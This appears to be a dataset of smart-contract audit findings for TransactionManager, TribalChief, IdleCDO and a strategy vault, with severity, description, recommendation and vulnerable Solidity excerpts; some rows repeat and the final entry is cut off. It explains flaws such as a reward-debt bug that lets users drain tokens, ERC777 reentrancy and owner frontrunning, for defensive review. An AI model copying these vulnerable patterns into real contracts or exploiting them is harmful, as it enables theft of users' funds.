fallback handlingчlowчWhen a transaction with a `callTo` that is not `address(0)` is fulfilled, the funds to be withdrawn on the user's behalf are first transferred to the `FulfillInterpreter` instance that is associated with this `TransactionManager` instance. 
After that, `execute` is called on that interpreter instance, which, in turn, tries to make a call to `callTo`. If that call reverts or isn't made in the first place because `callTo` is not a contract address, the funds are transferred directly to the `receivingAddress` in the transaction (which becomes `fallbackAddress` in execute); otherwise, it's the called contract's task to transfer the previously approved funds from the interpreter.\\n```\\nbool isNative = LibAsset.isNativeAsset(assetId);\\nif (!isNative) {\\n LibAsset.increaseERC20Allowance(assetId, callTo, amount);\\n}\\n\\n// Check if the callTo is a contract\\nbool success;\\nbytes memory returnData;\\nif (Address.isContract(callTo)) {\\n // Try to execute the callData\\n // the low level call will return `false` if its execution reverts\\n (success, returnData) = callTo.call{value: isNative ? amount : 0}(callData);\\n}\\n\\n// Handle failure cases\\nif (!success) {\\n // If it fails, transfer to fallback\\n LibAsset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isNative) {\\n LibAsset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n\\nFor the fallback scenario, i.e., the call isn't executed or fails, the funds are first transferred to `fallbackAddress`, and the previously increased allowance is decreased after that. If the token supports it, the recipient of the direct transfer could try to exploit that the approval hasn't been revoked yet, so the logically correct order is to decrease the allowance first and transfer the funds later. However, it should be noted that the `FulfillInterpreter` should, at any point in time, only hold the funds that are supposed to be transferred as part of the current transaction; if there are any excess funds, these are leftovers from a previous failure to withdraw everything that could have been withdrawn, so these can be considered up for grabs. 
Hence, this is only a minor issue.чWe recommend reversing the order of actions for the fallback case: Decrease the allowance first, and transfer later. Moreover, it would be better to increase the allowance only in case a call will actually be made, i.e., if `Address.isContract(callTo)` is `true`.\\nRemark\\nThis issue was already present in the original version of the code but was missed initially and only found during the re-audit.чч```\\nbool isNative = LibAsset.isNativeAsset(assetId);\\nif (!isNative) {\\n LibAsset.increaseERC20Allowance(assetId, callTo, amount);\\n}\\n\\n// Check if the callTo is a contract\\nbool success;\\nbytes memory returnData;\\nif (Address.isContract(callTo)) {\\n // Try to execute the callData\\n // the low level call will return `false` if its execution reverts\\n (success, returnData) = callTo.call{value: isNative ? amount : 0}(callData);\\n}\\n\\n// Handle failure cases\\nif (!success) {\\n // If it fails, transfer to fallback\\n LibAsset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isNative) {\\n LibAsset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n -FulfillInterpreter - Missing check whether callTo address contains codeчlowчResolution\\nThis issue has been fixed.\\nThe receiver-side `prepare` checks whether the `callTo` address is either zero or a contract:\\n```\\n// Check that the callTo is a contract\\n// NOTE: This cannot happen on the sending chain (different chain\\n// contexts), so a user could mistakenly create a transfer that must be\\n// cancelled if this is incorrect\\nrequire(invariantData.callTo == address(0) || Address.isContract(invariantData.callTo), \"#P:031\");\\n```\\n\\nHowever, as a contract may `selfdestruct` and the check is not repeated later, there is no guarantee that `callTo` still contains code when the call to this address (assuming it is non-zero) is actually executed in FulfillInterpreter.execute:\\n```\\n// Try to execute the callData\\n// 
the low level call will return `false` if its execution reverts\\n(bool success, bytes memory returnData) = callTo.call{value: isEther ? amount : 0}(callData);\\n\\nif (!success) {\\n // If it fails, transfer to fallback\\n Asset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isEther) {\\n Asset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n\\nAs a result, if the contract at `callTo` self-destructs between `prepare` and `fulfill` (both on the receiving chain), `success` will be `true`, and the funds will probably be lost to the user.\\nA user could currently try to avoid this by checking that the contract still exists before calling `fulfill` on the receiving chain, but even then, they might get front-run by `selfdestruct`, and the situation is even worse with a relayer, so this provides no reliable protection.чRepeat the `Address.isContract` check on `callTo` before making the external call in `FulfillInterpreter.execute` and send the funds to the `fallbackAddress` if the result is `false`.\\nIt is, perhaps, debatable whether the check in `prepare` should be kept or removed. In principle, if the contract gets deployed between `prepare` and `fulfill`, that is still soon enough. However, if the `callTo` address doesn't have code at the time of `prepare`, this seems more likely to be a mistake than a “late deployment”. So unless there is a demonstrated use case for “late deployments”, failing in `prepare` (even though it's receiver-side) might still be the better choice.\\nRemark\\nIt should be noted that an unsuccessful call, i.e., a revert, is the only behavior that is recognized by `FulfillInterpreter.execute` as failure. 
While it is prevalent to indicate failure by reverting, this doesn't have to be the case; a well-known example is an ERC20 token that indicates a failing transfer by returning `false`.\\nA user who wants to utilize this feature has to make sure that the called contract behaves accordingly; if that is not the case, an intermediary contract may be employed, which, for example, reverts for return value `false`.чч```\\n// Check that the callTo is a contract\\n// NOTE: This cannot happen on the sending chain (different chain\\n// contexts), so a user could mistakenly create a transfer that must be\\n// cancelled if this is incorrect\\nrequire(invariantData.callTo == address(0) || Address.isContract(invariantData.callTo), \"#P:031\");\\n```\\n -TransactionManager - Adherence to EIP-712 Won't Fixчlowч`fulfill` function requires the user signature on a `transactionId`. While currently, the user SDK code is using a cryptographically secured pseudo-random function to generate the `transactionId`, it should not be counted upon and measures should be placed on the smart-contract level to ensure replay-attack protection.\\n```\\nfunction recoverSignature(\\n bytes32 transactionId,\\n uint256 relayerFee,\\n string memory functionIdentifier,\\n bytes calldata signature\\n) internal pure returns (address) {\\n // Create the signed payload\\n SignedData memory payload = SignedData({\\n transactionId: transactionId,\\n relayerFee: relayerFee,\\n functionIdentifier: functionIdentifier\\n });\\n\\n // Recover\\n return ECDSA.recover(ECDSA.toEthSignedMessageHash(keccak256(abi.encode(payload))), signature);\\n}\\n```\\nчConsider adhering to EIP-712, or at least including `address(this), block.chainId` as part of the data signed by the user.чч```\\nfunction recoverSignature(\\n bytes32 transactionId,\\n uint256 relayerFee,\\n string memory functionIdentifier,\\n bytes calldata signature\\n) internal pure returns (address) {\\n // Create the signed payload\\n SignedData memory payload = 
SignedData({\\n transactionId: transactionId,\\n relayerFee: relayerFee,\\n functionIdentifier: functionIdentifier\\n });\\n\\n // Recover\\n return ECDSA.recover(ECDSA.toEthSignedMessageHash(keccak256(abi.encode(payload))), signature);\\n}\\n```\\n -TransactionManager - Hard-coded chain ID might lead to problems after a chain split PendingчlowчThe ID of the chain on which the contract is deployed is supplied as a constructor argument and stored as an `immutable` state variable:\\n```\\n/\\*\\*\\n \\* @dev The chain id of the contract, is passed in to avoid any evm issues\\n \\*/\\nuint256 public immutable chainId;\\n```\\n\\n```\\nconstructor(uint256 \\_chainId) {\\n chainId = \\_chainId;\\n interpreter = new FulfillInterpreter(address(this));\\n}\\n```\\n\\nHence, `chainId` can never change, and even after a chain split, both contracts would continue to use the same chain ID. That can have undesirable consequences. For example, a transaction that was prepared before the split could be fulfilled on both chains.чIt would be better to query the chain ID directly from the chain via `block.chainId`. However, the development team informed us that they had encountered problems with this approach as some chains apparently are not implementing this correctly. They resorted to the method described above, a constructor-supplied, hard-coded value. For chains that do indeed not inform correctly about their chain ID, this is a reasonable solution. 
However, for the reasons outlined above, we still recommend querying the chain ID via `block.chainId` for chains that do support that — which should be the vast majority — and using the fallback mechanism only when necessary.чч```\\n/\\*\\*\\n \\* @dev The chain id of the contract, is passed in to avoid any evm issues\\n \\*/\\nuint256 public immutable chainId;\\n```\\n -TribalChief - A wrong user.rewardDebt value is calculated during the withdrawFromDeposit function callчhighчWhen withdrawing a single deposit, the reward debt is updated:\\n```\\nuint128 virtualAmountDelta = uint128( ( amount \\* poolDeposit.multiplier ) / SCALE\\_FACTOR );\\n\\n// Effects\\npoolDeposit.amount -= amount;\\nuser.rewardDebt = user.rewardDebt - toSigned128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\nuser.virtualAmount -= virtualAmountDelta;\\npool.virtualTotalSupply -= virtualAmountDelta;\\n```\\n\\nInstead of the `user.virtualAmount` in reward debt calculation, the `virtualAmountDelta` should be used. Because of that bug, the reward debt is much lower than it would be, which means that the reward itself will be much larger during the harvest. By making multiple deposit-withdraw actions, any user can steal all the Tribe tokens from the contract.чUse the `virtualAmountDelta` instead of the `user.virtualAmount`.чч```\\nuint128 virtualAmountDelta = uint128( ( amount \\* poolDeposit.multiplier ) / SCALE\\_FACTOR );\\n\\n// Effects\\npoolDeposit.amount -= amount;\\nuser.rewardDebt = user.rewardDebt - toSigned128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\nuser.virtualAmount -= virtualAmountDelta;\\npool.virtualTotalSupply -= virtualAmountDelta;\\n```\\n -TribalChief - Unlocking users' funds in a pool where a multiplier has been increased is missingчmediumчWhen a user deposits funds to a pool, the current multiplier in use for this pool is being stored locally for this deposit. 
The value that is used later in a withdrawal operation is the local one, and not the one that is changing when a `governor` calls `governorAddPoolMultiplier`. It means that a decrease in the multiplier value for a given pool does not affect users that already deposited, but an increase does. Users that had already deposited should have the right to withdraw their funds when the multiplier for their pool increases by the `governor`.\\n```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\nчReplace the `<` operator with `>` in `TribalChief` line 152.чч```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n -TribalChief - Unsafe down-castingsчmediumч`TribalChief` consists of multiple unsafe down-casting operations. 
While the usage of types that can be packed into a single storage slot is more gas efficient, it may introduce hidden risks in some cases that can lead to loss of funds.\\nVarious instances in `TribalChief`, including (but not necessarily only) :\\n```\\nuser.rewardDebt = int128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\n\\n```\\npool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n```\\n\\n```\\nuserPoolData.rewardDebt += int128(virtualAmountDelta \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\nчGiven the time constraints of this audit engagement, we could not verify the implications and provide mitigation actions for each of the unsafe down-castings operations. However, we do recommend to either use numeric types that use 256 bits, or to add proper validation checks and handle these scenarios to avoid silent over/under-flow errors. Keep in mind that reverting these scenarios can sometimes lead to a denial of service, which might be harmful in some cases.чч```\\nuser.rewardDebt = int128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\n -TribalChief - Governor decrease of pool's allocation point should unlock depositors' fundsчlowчWhen the `TribalChief` governor decreases the ratio between the allocation point (PoolInfo.allocPoint) and the total allocation point (totalAllocPoint) for a specific pool (either be directly decreasing `PoolInfo.allocPoint` of a given pool, or by increasing this value for other pools), the total reward for this pool is decreased as well. 
Depositors should be able to withdraw their funds immediately after this kind of change.\\n```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\nчMake sure that depositors' funds are unlocked for pools that affected negatively by calling `TribalChief.set`.чч```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n -TribalChief - new block reward retrospectively takes effect on pools that have not been updated recentlyчlowчWhen the governor updates the block reward `tribalChiefTribePerBlock` the new reward is applied for the outstanding duration of blocks in `updatePool`. 
This means, if a pool hasn't updated in a while (unlikely) the new block reward is retrospectively applied to the pending duration instead of starting from when the block reward changed.\\nrewards calculation\\n```\\nif (virtualSupply > 0) {\\n uint256 blocks = block.number - pool.lastRewardBlock;\\n uint256 tribeReward = (blocks \\* tribePerBlock() \\* pool.allocPoint) / totalAllocPoint;\\n pool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n}\\n```\\n\\nupdating the block reward\\n```\\n/// @notice Allows governor to change the amount of tribe per block\\n/// @param newBlockReward The new amount of tribe per block to distribute\\nfunction updateBlockReward(uint256 newBlockReward) external onlyGovernor {\\n tribalChiefTribePerBlock = newBlockReward;\\n emit NewTribePerBlock(newBlockReward);\\n}\\n```\\nчIt is recommended to update pools before changing the block reward. Document and make users aware that the new reward is applied to the outstanding duration when calling `updatePool`.чч```\\nif (virtualSupply > 0) {\\n uint256 blocks = block.number - pool.lastRewardBlock;\\n uint256 tribeReward = (blocks \\* tribePerBlock() \\* pool.allocPoint) / totalAllocPoint;\\n pool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n}\\n```\\n -TribalChief - resetRewards should emit an eventчlowчThe method `resetRewards` silently resets a pools tribe allocation.\\n```\\n/// @notice Reset the given pool's TRIBE allocation to 0 and unlock the pool. Can only be called by the governor or guardian.\\n/// @param \\_pid The index of the pool. See `poolInfo`. 
\\nfunction resetRewards(uint256 \\_pid) public onlyGuardianOrGovernor {\\n // set the pool's allocation points to zero\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint);\\n poolInfo[\\_pid].allocPoint = 0;\\n \\n // unlock all staked tokens in the pool\\n poolInfo[\\_pid].unlocked = true;\\n\\n // erase any IRewarder mapping\\n rewarder[\\_pid] = IRewarder(address(0));\\n}\\n```\\nчFor transparency and to create an easily accessible audit trail of events consider emitting an event when resetting a pools allocation.чч```\\n/// @notice Reset the given pool's TRIBE allocation to 0 and unlock the pool. Can only be called by the governor or guardian.\\n/// @param \\_pid The index of the pool. See `poolInfo`. \\nfunction resetRewards(uint256 \\_pid) public onlyGuardianOrGovernor {\\n // set the pool's allocation points to zero\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint);\\n poolInfo[\\_pid].allocPoint = 0;\\n \\n // unlock all staked tokens in the pool\\n poolInfo[\\_pid].unlocked = true;\\n\\n // erase any IRewarder mapping\\n rewarder[\\_pid] = IRewarder(address(0));\\n}\\n```\\n -TribalChief - Unlocking users' funds in a pool where a multiplier has been increased is missingчmediumчWhen a user deposits funds to a pool, the current multiplier in use for this pool is being stored locally for this deposit. The value that is used later in a withdrawal operation is the local one, and not the one that is changing when a `governor` calls `governorAddPoolMultiplier`. It means that a decrease in the multiplier value for a given pool does not affect users that already deposited, but an increase does. 
Users that had already deposited should have the right to withdraw their funds when the multiplier for their pool increases by the `governor`.\\n```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\nчReplace the `<` operator with `>` in `TribalChief` line 152.чч```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n -TribalChief - Governor decrease of pool's allocation point should unlock depositors' fundsчlowчWhen the `TribalChief` governor decreases the ratio between the allocation point (PoolInfo.allocPoint) and the total allocation point (totalAllocPoint) for a specific pool (either be directly decreasing `PoolInfo.allocPoint` of a given pool, or by increasing this value for other pools), the total reward for this pool is decreased as well. 
Depositors should be able to withdraw their funds immediately after this kind of change.\\n```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\nчMake sure that depositors' funds are unlocked for pools that affected negatively by calling `TribalChief.set`.чч```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n -IdleCDO._deposit() allows re-entrancy from hookable tokens.чmediumчThe function `IdleCDO._deposit()` updates the system's internal accounting and mints shares to the caller, then transfers the deposited funds from the user. Some token standards, such as ERC777, allow a callback to the source of the funds before the balances are updated in `transferFrom()`. 
This callback could be used to re-enter the protocol while already holding the minted tranche tokens and at a point where the system accounting reflects a receipt of funds that has not yet occurred.\\nWhile an attacker could not interact with `IdleCDO.withdraw()` within this callback because of the `_checkSameTx()` restriction, they would be able to interact with the rest of the protocol.\\n```\\nfunction \\_deposit(uint256 \\_amount, address \\_tranche) internal returns (uint256 \\_minted) {\\n // check that we are not depositing more than the contract available limit\\n \\_guarded(\\_amount);\\n // set \\_lastCallerBlock hash\\n \\_updateCallerBlock();\\n // check if strategyPrice decreased\\n \\_checkDefault();\\n // interest accrued since last depositXX/withdrawXX/harvest is splitted between AA and BB\\n // according to trancheAPRSplitRatio. NAVs of AA and BB are updated and tranche\\n // prices adjusted accordingly\\n \\_updateAccounting();\\n // mint tranche tokens according to the current tranche price\\n \\_minted = \\_mintShares(\\_amount, msg.sender, \\_tranche);\\n // get underlyings from sender\\n IERC20Detailed(token).safeTransferFrom(msg.sender, address(this), \\_amount);\\n}\\n```\\nчMove the `transferFrom()` action in `_deposit()` to immediately after `_updateCallerBlock()`.чч```\\nfunction \\_deposit(uint256 \\_amount, address \\_tranche) internal returns (uint256 \\_minted) {\\n // check that we are not depositing more than the contract available limit\\n \\_guarded(\\_amount);\\n // set \\_lastCallerBlock hash\\n \\_updateCallerBlock();\\n // check if strategyPrice decreased\\n \\_checkDefault();\\n // interest accrued since last depositXX/withdrawXX/harvest is splitted between AA and BB\\n // according to trancheAPRSplitRatio. 
NAVs of AA and BB are updated and tranche\\n // prices adjusted accordingly\\n \\_updateAccounting();\\n // mint tranche tokens according to the current tranche price\\n \\_minted = \\_mintShares(\\_amount, msg.sender, \\_tranche);\\n // get underlyings from sender\\n IERC20Detailed(token).safeTransferFrom(msg.sender, address(this), \\_amount);\\n}\\n```\\n -IdleCDO.virtualPrice() and _updatePrices() yield different prices in a number of casesчmediumчThe function `IdleCDO.virtualPrice()` is used to determine the current price of a tranche. Similarly, `IdleCDO._updatePrices()` is used to store the latest price of a tranche, as well as update other parts of the system accounting. There are a number of cases where the prices yielded by these two functions differ. While these are primarily corner cases that are not obviously exploitable in practice, potential violations of key accounting invariants should always be considered serious.\\nAdditionally, the use of two separate implementations of the same calculation suggest the potential for more undiscovered discrepancies, possibly of higher consequence.\\nAs an example, in `_updatePrices()` the precision loss from splitting the strategy returns favors BB tranche holders. 
In `virtualPrice()` both branches of the price calculation incur precision loss, favoring the `IdleCDO` contract itself.\\n`_updatePrices()`\\n```\\nif (BBTotSupply == 0) {\\n // if there are no BB holders, all gain to AA\\n AAGain = gain;\\n} else if (AATotSupply == 0) {\\n // if there are no AA holders, all gain to BB\\n BBGain = gain;\\n} else {\\n // split the gain between AA and BB holders according to trancheAPRSplitRatio\\n AAGain = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n BBGain = gain - AAGain;\\n}\\n```\\n\\n`virtualPrice()`\\n```\\nif (\\_tranche == AATranche) {\\n // calculate gain for AA tranche\\n // trancheGain (AAGain) = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n trancheNAV = lastNAVAA + (gain \\* \\_trancheAPRSplitRatio / FULL\\_ALLOC);\\n} else {\\n // calculate gain for BB tranche\\n // trancheGain (BBGain) = gain \\* (FULL\\_ALLOC - trancheAPRSplitRatio) / FULL\\_ALLOC;\\n trancheNAV = lastNAVBB + (gain \\* (FULL\\_ALLOC - \\_trancheAPRSplitRatio) / FULL\\_ALLOC);\\n}\\n```\\nчImplement a single method that determines the current price for a tranche, and use this same implementation anywhere the price is needed.чч```\\nif (BBTotSupply == 0) {\\n // if there are no BB holders, all gain to AA\\n AAGain = gain;\\n} else if (AATotSupply == 0) {\\n // if there are no AA holders, all gain to BB\\n BBGain = gain;\\n} else {\\n // split the gain between AA and BB holders according to trancheAPRSplitRatio\\n AAGain = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n BBGain = gain - AAGain;\\n}\\n```\\n -IdleCDO.harvest() allows price manipulation in certain circumstancesчmediumчThe function `IdleCDO.harvest()` uses Uniswap to liquidate rewards earned by the contract's strategy, then updates the relevant positions and internal accounting. 
This function can only be called by the contract `owner` or the designated `rebalancer` address, and it accepts an array which indicates the minimum buy amounts for the liquidation of each reward token.\\nThe purpose of permissioning this method and specifying minimum buy amounts is to prevent a sandwiching attack from manipulating the reserves of the Uniswap pools and forcing the `IdleCDO` contract to incur loss due to price slippage.\\nHowever, this does not effectively prevent price manipulation in all cases. Because the contract sells it's entire balance of redeemed rewards for the specified minimum buy amount, this approach does not enforce a minimum price for the executed trades. If the balance of `IdleCDO` or the amount of claimable rewards increases between the submission of the `harvest()` transaction and its execution, it may be possible to perform a profitable sandwiching attack while still satisfying the required minimum buy amounts.\\nThe viability of this exploit depends on how effectively an attacker can increase the amount of rewards tokens to be sold without incurring an offsetting loss. 
The strategy contracts used by `IdleCDO` are expected to vary widely in their implementations, and this manipulation could potentially be done either through direct interaction with the protocol or as part of a flashbots bundle containing a large position adjustment from an honest user.\\n```\\nfunction harvest(bool \\_skipRedeem, bool \\_skipIncentivesUpdate, bool[] calldata \\_skipReward, uint256[] calldata \\_minAmount) external {\\n require(msg.sender == rebalancer || msg.sender == owner(), \"IDLE:!AUTH\");\\n```\\n\\n```\\n// approve the uniswap router to spend our reward\\nIERC20Detailed(rewardToken).safeIncreaseAllowance(address(\\_uniRouter), \\_currentBalance);\\n// do the uniswap trade\\n\\_uniRouter.swapExactTokensForTokensSupportingFeeOnTransferTokens(\\n \\_currentBalance,\\n \\_minAmount[i],\\n \\_path,\\n address(this),\\n block.timestamp + 1\\n);\\n```\\nчUpdate `IdleCDO.harvest()` to enforce a minimum price rather than a minimum buy amount. One method of doing so would be taking an additional array parameter indicating the amount of each token to sell in exchange for the respective buy amount.чч```\\nfunction harvest(bool \\_skipRedeem, bool \\_skipIncentivesUpdate, bool[] calldata \\_skipReward, uint256[] calldata \\_minAmount) external {\\n require(msg.sender == rebalancer || msg.sender == owner(), \"IDLE:!AUTH\");\\n```\\n -Missing Sanity checksчlowчThe implementation of `initialize()` functions are missing some sanity checks. 
The proper checks are implemented in some of the setter functions but missing in some others.\\nMissing sanity check for `!= address(0)`\\n```\\ntoken = \\_guardedToken;\\nstrategy = \\_strategy;\\nstrategyToken = IIdleCDOStrategy(\\_strategy).strategyToken();\\nrebalancer = \\_rebalancer;\\n```\\n\\n```\\nguardian = \\_owner;\\n```\\n\\n```\\naddress \\_currAAStaking = AAStaking;\\naddress \\_currBBStaking = BBStaking;\\n```\\n\\n```\\nidleCDO = \\_idleCDO;\\ntranche = \\_trancheToken;\\nrewards = \\_rewards;\\ngovernanceRecoveryFund = \\_governanceRecoveryFund;\\n```\\nчResolution\\nThe development team has addressed this concern in commit `a1d5dac0ad5f562d4c75bff99e770d92bcc2a72f`. This change has not been reviewed by the audit team.\\nAdd sanity checks before assigning system variables.чч```\\ntoken = \\_guardedToken;\\nstrategy = \\_strategy;\\nstrategyToken = IIdleCDOStrategy(\\_strategy).strategyToken();\\nrebalancer = \\_rebalancer;\\n```\\n -Frontrunning attacks by the ownerчhighчThere are few possible attack vectors by the owner:\\nAll strategies have fees from rewards. In addition to that, the PancakeSwap strategy has deposit fees. The default deposit fees equal zero; the maximum is limited to 5%:\\n```\\nuint256 constant MAXIMUM\\_DEPOSIT\\_FEE = 5e16; // 5%\\nuint256 constant DEFAULT\\_DEPOSIT\\_FEE = 0e16; // 0%\\n \\nuint256 constant MAXIMUM\\_PERFORMANCE\\_FEE = 50e16; // 50%\\nuint256 constant DEFAULT\\_PERFORMANCE\\_FEE = 10e16; // 10%\\n```\\n\\nWhen a user deposits tokens, expecting to have zero deposit fees, the `owner` can frontrun the deposit and increase fees to 5%. If the deposit size is big enough, that may be a significant amount of money. 2. 
In the `gulp` function, the reward tokens are exchanged for the reserve tokens on the exchange:\\n```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n {\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n uint256 \\_feeReward = \\_totalReward.mul(performanceFee) / 1e18;\\n Transfers.\\_pushFunds(rewardToken, collector, \\_feeReward);\\n }\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalRouting = Transfers.\\_getBalance(routingToken);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n require(\\_totalBalance >= \\_minRewardAmount, \"high slippage\");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n\\nThe `owner` can change the `exchange` parameter to the malicious address that steals tokens. The `owner` then calls `gulp` with `_minRewardAmount==0`, and all the rewards will be stolen. 
The same attack can be implemented in fee collectors and the buyback contract.чResolution\\nThe client communicated this issue was addressed in commit 34c6b355795027d27ae6add7360e61eb6b01b91b.\\nUse a timelock to avoid instant changes of the parameters.чч```\\nuint256 constant MAXIMUM\\_DEPOSIT\\_FEE = 5e16; // 5%\\nuint256 constant DEFAULT\\_DEPOSIT\\_FEE = 0e16; // 0%\\n \\nuint256 constant MAXIMUM\\_PERFORMANCE\\_FEE = 50e16; // 50%\\nuint256 constant DEFAULT\\_PERFORMANCE\\_FEE = 10e16; // 10%\\n```\\n -Expected amounts of tokens in the withdraw functionчmediumчEvery `withdraw` function in the strategy contracts is calculating the expected amount of the returned tokens before withdrawing them:\\n```\\nfunction withdraw(uint256 \\_shares, uint256 \\_minAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n address \\_from = msg.sender;\\n (uint256 \\_amount, uint256 \\_withdrawalAmount, uint256 \\_netAmount) = \\_calcAmountFromShares(\\_shares);\\n require(\\_netAmount >= \\_minAmount, \"high slippage\");\\n \\_burn(\\_from, \\_shares);\\n \\_withdraw(\\_amount);\\n Transfers.\\_pushFunds(reserveToken, \\_from, \\_withdrawalAmount);\\n}\\n```\\n\\nAfter that, the contract is trying to transfer this pre-calculated amount to the `msg.sender`. It is never checked whether the intended amount was actually transferred to the strategy contract. If the amount is lower, that may result in reverting the `withdraw` function all the time and locking up tokens.\\nEven though we did not find any specific case of returning a different amount of tokens, it is still a 